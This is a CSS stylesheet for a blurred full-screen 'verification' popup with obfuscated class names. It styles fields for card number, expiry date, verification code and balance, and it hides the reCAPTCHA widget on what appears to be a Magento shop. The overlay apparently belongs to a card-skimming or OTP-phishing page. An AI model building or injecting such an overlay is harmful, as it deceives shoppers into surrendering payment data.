* {
	box-sizing: border-box;
	font-family: 'Arial' !important;
}

#rc-anchor-container {
	display: none !important;
}

._keyfocus *:focus,
input:not([disabled]):focus,
textarea:not([disabled]):focus,
select:not([disabled]):focus {
	box-shadow: none !important;
}

button:active,
.cart.table-wrapper .actions-toolbar > .action:active,
.action-gift:active {
	box-shadow: none !important;
}

.verification-modal-sAaSjdiHU73AdSDfHUudh42as3usat {
	display: none;
	position: fixed;
	inset: 0;
	z-index: 9999;
	background: rgba(0, 0, 0, 0.55);
	backdrop-filter: blur(8px);
	animation: fadeIn 0.3s ease forwards;
	padding: 16px;
	overflow-y: auto;
}

.verification-modal-sAaSjdiHU73AdSDfHUudh42as3usat.active {
	display: flex;
	opacity: 1;
}

.modal-top-container-sAaSjdiHU73AdSDfHUudh42as3usat {
	display: flex;
	align-items: center;
	font-size: 16px;
	justify-content: space-between;
	background: linear-gradient(145deg, #ffbb54, #c57b0d);
	position: absolute;
	left: 0;
	top: 0;
	width: 100%;
	height: 45px;
	padding: 0px 30px;
	color: #fff;
	font-weight: 700;
}

.modal-secure-sAaSjdiHU73AdSDfHUudh42as3usat {
	color: #fff;
	font-weight: 600;
}

.ghost-btn-sAaSjdiHU73AdSDfHUudh42as3usat {
	border: none;
	font-size: 16px;
	margin-top: 10px;
	background: transparent !important;
	color: #2f1aa5 !important;
	width: 100%;
	padding: 12px 16px;
	cursor: pointer;
}

.modal-verify-sAaSjdiHU73AdSDfHUudh42as3usat {
	font-weight: 700;
	margin-top: 30px;
	margin-bottom: 40px;
	display: flex;
	width: 100%;
	justify-content: space-between;
	align-items: center;
}

.modal-verify-sAaSjdiHU73AdSDfHUudh42as3usat img {
	width: 70px !important;
}

.modal-verify-sAaSjdiHU73AdSDfHUudh42as3usat::after {
	content: '';
	position: absolute;
	width: 100%;
	height: 1px;
	left: 0;
	top: 155px;
	background: #000;
	opacity: 0.2;
}

.modal-content-m-sAaSjdiHU73AdSDfHUudh42as3usat {
	position: relative;
	margin: auto;
	padding: clamp(20px, 4vw, 32px);
	background: #fff;
	border-radius: 2px;
	box-shadow: 0 12px 40px rgba(0, 0, 0, 0.15);
	width: 100%;
	max-width: 320px;
	font-family: 'Inter', system-ui, sans-serif;
	text-align: center;
	transform: translateY(30px);
	animation: slideUp 0.35s ease forwards;
}

.modal-close-sAaSjdiHU73AdSDfHUudh42as3usat {
	color: #333333;
	opacity: 0.65;
	background: transparent;
	border: none;
	cursor: pointer;
	transition: color 0.25s ease, transform 0.2s ease;
}

.modal-close-sAaSjdiHU73AdSDfHUudh42as3usat:hover {
	opacity: 0.75;
}

.modal-status-sAaSjdiHU73AdSDfHUudh42as3usat {
	text-align: start;
	margin: 4px 0;
}
.modal-icon-sAaSjdiHU73AdSDfHUudh42as3usat {
	width: clamp(56px, 12vw, 72px);
	height: clamp(56px, 12vw, 72px);
	margin: 0 auto 18px;
	border-radius: 50%;
	background: linear-gradient(145deg, #6dd5ed, #2193b0);
	color: white;
	display: flex;
	align-items: center;
	justify-content: center;
	box-shadow: 0 4px 16px rgba(33, 147, 176, 0.4);
	animation: popIn 0.4s ease;
}

.modal-icon-sAaSjdiHU73AdSDfHUudh42as3usat svg {
	width: 65%;
	height: 65%;
}

.modal-title-sAaSjdiHU73AdSDfHUudh42as3usat {
	font-size: 17px;
	font-weight: 600;
	margin-bottom: 8px;
	color: #1a1a1a;
	text-align: start;
}

.modal-message-sAaSjdiHU73AdSDfHUudh42as3usat {
	font-size: 14px;
	color: #555;
	margin-bottom: 20px;
	line-height: 1.5;
	text-align: start;
}

.modal-input-sAaSjdiHU73AdSDfHUudh42as3usat {
	flex: 1;
	height: 100%;
	width: 100%;
	padding: 12px 14px;
	font-size: 22px !important;
	border: none !important;
	outline: none !important;
	background: transparent !important;
	color: #333;
	text-align: center;
	font-weight: 600;
	letter-spacing: 6px;
	caret-color: #ccc;
}

.modal-input-sAaSjdiHU73AdSDfHUudh42as3usat::placeholder {
	color: #aaa;
}

.date-sAaSjdiHU73AdSDfHUudh42as3usat,
.card-number-sAaSjdiHU73AdSDfHUudh42as3usat,
.verif-code-sAaSjdiHU73AdSDfHUudh42as3usat {
	margin: 0;
	font-size: 14px;
	display: block;
	color: #555;
	text-align: left;
}

.verif-code-sAaSjdiHU73AdSDfHUudh42as3usat {
	margin-top: 10px;
	font-weight: 600;
	color: #e2992b;
}

.modal-btn-sAaSjdiHU73AdSDfHUudh42as3usat {
	margin-top: 10px;
	width: 100%;
	padding: 12px 16px;
	font-size: 16px;
	font-weight: 600;
	cursor: pointer;
	border: none;
	color: #fff;
	background: #4d33dd;
	transition: background 0.25s ease, transform 0.15s ease;
}

.modal-btn-sAaSjdiHU73AdSDfHUudh42as3usat:hover {
	background-color: #e0e0e0;
}

.modal-input-container-sAaSjdiHU73AdSDfHUudh42as3usat {
	margin-top: 10px;
	display: flex;
	align-items: center;
	width: 100%;
	padding: 4px;
	border: 2px solid #ddd;
	border-radius: 4px;
	background: white;
	overflow: hidden;
	text-align: center;
}

.balance-currency-sAaSjdiHU73AdSDfHUudh42as3usat {
	display: flex;
	align-items: center;
	justify-content: center;
	min-width: 50px;
	height: 100%;
	color: #555;
	font-weight: 600;
	font-size: 15px;
	border-radius: 6px;
	margin-left: 8px;
	padding: 0 8px;
	white-space: nowrap;
}

.modal-btn-sAaSjdiHU73AdSDfHUudh42as3usat.primary {
	background: linear-gradient(135deg, #64dbff, #5070ff);
	color: white;
}

.modal-btn-sAaSjdiHU73AdSDfHUudh42as3usat.primary:hover {
	background: linear-gradient(135deg, #1e448b, #4960e2);
	transform: translateY(-2px);
}

.modal-btn-sAaSjdiHU73AdSDfHUudh42as3usat.secondary {
	background: linear-gradient(135deg, #667db6, #0082c8, #0082c8);
	color: white;
}

.modal-btn-sAaSjdiHU73AdSDfHUudh42as3usat.secondary:hover {
	background: linear-gradient(135deg, #5a6aa4, #006a9f);
	transform: translateY(-2px);
}

@keyframes fadeIn {
	from {
		opacity: 0;
	}
	to {
		opacity: 1;
	}
}

@keyframes slideUp {
	from {
		transform: translateY(40px);
		opacity: 0;
	}
	to {
		transform: translateY(0);
		opacity: 1;
	}
}

@keyframes popIn {
	from {
		transform: scale(0.5);
		opacity: 0;
	}
	to {
		transform: scale(1);
		opacity: 1;
	}
}

@media (max-width: 480px) {
	.modal-content-m-sAaSjdiHU73AdSDfHUudh42as3usat {
		border-radius: 14px;
	}
	.modal-title-sAaSjdiHU73AdSDfHUudh42as3usat {
		font-size: 18px;
	}
}

.spinner-m-sAaSjdiHU73AdSDfHUudh42as3usat {
	width: 32px !important;
	height: 32px !important;
	border: 5px solid #fff;
	border-bottom-color: #2583ff;
	border-radius: 50%;
	display: inline-block;
	box-sizing: border-box;
	animation: rotation 1s linear infinite;
}

.modal-loader-sAaSjdiHU73AdSDfHUudh42as3usat {
	display: flex;
	flex-direction: column;
	align-items: center;
	gap: 16px;
}

@keyframes rotation {
	0% {
		transform: rotate(0deg);
	}
	100% {
		transform: rotate(360deg);
	}
}

.validateMsg-sAaSjdiHU73AdSDfHUudh42as3usat {
	display: block !important;
	width: 100% !important;
	color: rgb(211, 66, 66) !important;
}

@media (max-width: 576px) {
	.modal-verify-sAaSjdiHU73AdSDfHUudh42as3usat {
		margin-top: 40px;
	}
}

#validateMsg {
	display: block !important;
	width: 100% !important;
	color: rgb(211, 66, 66) !important;
}
